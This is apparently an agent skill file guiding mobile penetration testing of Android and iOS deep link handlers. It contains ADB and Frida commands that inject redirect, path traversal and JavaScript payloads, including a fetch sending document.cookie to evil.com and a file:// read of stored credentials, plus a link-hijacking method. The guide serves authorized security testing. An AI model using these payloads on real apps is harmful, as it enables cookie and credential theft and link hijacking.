seikaikyo/exploiting-deeplink-vulnerabilities

Exploiting Deep Link Vulnerabilities

When to Use

Use this skill when:

• Assessing mobile app deep link handling for injection and redirect vulnerabilities
• Testing Android intent filters and iOS URL scheme handlers for unauthorized access
• Evaluating App Links (Android) and Universal Links (iOS) verification
• Testing for link hijacking via competing app registrations

Do not use without authorization -- deep link exploitation can trigger unintended actions in target applications.

Prerequisites

• Android device with ADB or iOS device with Objection/Frida
• APK decompiled with apktool or JADX for AndroidManifest.xml analysis
• Knowledge of target app's registered URL schemes and intent filters
• Drozer for Android intent testing
• Burp Suite for intercepting deep link-triggered API calls

Workflow

Step 1: Enumerate Deep Link Entry Points

Android - Extract from AndroidManifest.xml:

# Decompile APK
apktool d target.apk -o decompiled/

# Search for intent filters with deep link schemes
grep -A 10 "android.intent.action.VIEW" decompiled/AndroidManifest.xml

# Look for:
# <data android:scheme="myapp" android:host="action" />
# <data android:scheme="https" android:host="target.com" />

iOS - Extract from Info.plist:

# Extract URL schemes
plutil -p Payload/TargetApp.app/Info.plist | grep -A 5 "CFBundleURLSchemes"

# Extract Universal Links (Associated Domains)
plutil -p Payload/TargetApp.app/Info.plist | grep -A 5 "com.apple.developer.associated-domains"
# Check: applinks:target.com

# Verify apple-app-site-association file
curl https://target.com/.well-known/apple-app-site-association

Step 2: Test Deep Link Injection

Android via ADB:

# Basic deep link invocation
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://dashboard?user_id=1337" com.target.app

# Test with injection payloads
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://profile?redirect=https://evil.com" com.target.app

# Test path traversal
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://navigate?path=../../../admin" com.target.app

# Test JavaScript injection (if loaded in WebView)
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://webview?url=javascript:alert(document.cookie)" com.target.app

# Test with extra intent parameters
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://transfer?amount=1000&to=attacker" \
  --es extra_param "injected_value" com.target.app

iOS via Safari or command line:

# Trigger URL scheme from Safari
# Navigate to: myapp://dashboard?user_id=1337

# Using Frida to invoke
frida -U -n TargetApp -e '
ObjC.classes.UIApplication.sharedApplication()
  .openURL_(ObjC.classes.NSURL.URLWithString_("myapp://profile?redirect=https://evil.com"));
'

Step 3: Test Link Hijacking

Android:

# Create a malicious app that registers the same URL scheme
# AndroidManifest.xml of attacker app:
# <intent-filter>
#   <action android:name="android.intent.action.VIEW" />
#   <category android:name="android.intent.category.DEFAULT" />
#   <category android:name="android.intent.category.BROWSABLE" />
#   <data android:scheme="myapp" />
# </intent-filter>

# When both apps are installed, Android shows a chooser dialog
# On older Android versions, the first-installed app may handle the link

# Check App Links verification (prevents hijacking)
adb shell pm get-app-links com.target.app
# Status: verified = secure
# Status: undefined = vulnerable to hijacking

Step 4: Test WebView Deep Link Loading

# If deep links load URLs in WebView, test for:
# 1. Open redirect
adb shell am start -d "myapp://open?url=https://evil.com" com.target.app

# 2. File access
adb shell am start -d "myapp://open?url=file:///data/data/com.target.app/shared_prefs/creds.xml"

# 3. JavaScript execution in WebView
adb shell am start -d "myapp://open?url=javascript:fetch('https://evil.com/steal?cookie='+document.cookie)"

Step 5: Assess Parameter Validation

Test each deep link parameter for:

• SQL injection in parameters that query local databases
• Path traversal in file path parameters
• SSRF in URL parameters that trigger server requests
• Authentication bypass via user_id or session parameters

Key Concepts

| Term | Definition | |------|-----------| | Custom URL Scheme | App-registered protocol (myapp://) that routes to specific app handlers when invoked | | App Links (Android) | Verified HTTPS deep links that bypass the chooser dialog and open directly in the verified app | | Universal Links (iOS) | Apple's verified deep linking using apple-app-site-association JSON file on the web domain | | Intent Hijacking | Malicious app intercepting deep links by registering the same URL scheme or intent filter | | WebView Bridge | JavaScript interface exposed to WebView content, potentially accessible via deep link-loaded URLs |

Tools & Systems

• ADB: Android command-line tool for invoking deep links via am start
• Drozer: Android security framework for testing intent-based attack surface
• apktool: APK decompiler for extracting AndroidManifest.xml and intent filter definitions
• Frida: Dynamic instrumentation for hooking URL scheme handlers at runtime
• Burp Suite: Proxy for intercepting API calls triggered by deep link navigation

Common Pitfalls

• App Links verification: Android App Links with verified domain associations are resistant to hijacking. Check assetlinks.json at https://domain/.well-known/assetlinks.json.
• Fragment handling: Some apps process URL fragments (#) differently than query parameters (?). Test both.
• Encoding bypass: URL-encode payloads to bypass client-side input filtering in deep link handlers.
• Multi-step deep links: Some deep links require authentication state. Test after login and before login to assess authorization enforcement.